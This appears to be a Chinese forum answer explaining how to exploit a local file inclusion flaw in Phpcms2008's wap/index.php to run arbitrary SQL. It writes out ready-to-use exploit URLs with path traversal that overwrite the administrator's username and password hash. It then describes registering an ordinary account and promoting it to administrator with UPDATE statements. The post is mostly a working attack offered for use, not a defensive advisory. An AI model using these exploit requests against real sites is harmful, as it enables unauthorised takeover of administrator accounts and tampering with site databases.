Phpcms2008本地文件包含漏洞及利用:任意SQL语句执行

网络安全时间:2022-09-01 21:54:43

Phpcms2008本地文件包含漏洞及利用:任意SQL语句执行

***回答

admin

树之空

回答于:2022-09-01

漏洞文件在wap/index.php,包含的文件限制为*.inc.php。随便包含一个有利用价值的去包含即可。


formguide/admin/include/fields/datetime/field_add.inc.php


EXP:错误的!!!!!!请看最下面的

老君只给了POC

朋友问我,访问那个poc就跳转,怎么爆密码

因为是执行SQL,不会回显的,所以爆不了帐号密码。

只能update和INSERT INTO了

INSERT INTO添加管理员当然是***的了。

我这里就给个UPDATE更新的吧

http://www.site.com/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=UPDATE phpcms_member SET username =123456 where userid=1

这个是把管理帐户改成123456


http://www.site.com/wap/index.php?action=../../formguide/admin/include/fields/datetime/field_add&sql=UPDATE phpcms_member SET password =e10adc3949ba59abbe56e057f20f883e where userid=1

这个是把管理帐户密码改成123456


userid可以自行变化,一般情况下,管理是1,有的可能是2,3,4。。。。。。。。


------------------------------------------------------------------------------------------------------

很抱歉,就光写,理论上是对的,但是实际却行不通

经过测试,只能update的值必须是数字,含有字母,就update不进去。

帐号可以是数字的值,但是md5肯定得有字母啊,我是没找到纯数字的32位MD5。

变换个方法吧

先注册一个帐号。

这样就成功的在数据库添加了我们的帐户,我们剩下的就是update把自己变成管理员,两句就搞定了。
关于网站
树之空,一个聚集程序员工作开发的文章知识网站。你可以浏览到大量的软件编程开发文章,互联网新闻,IT行业资讯热点,编程开发,数据库服务器等知识。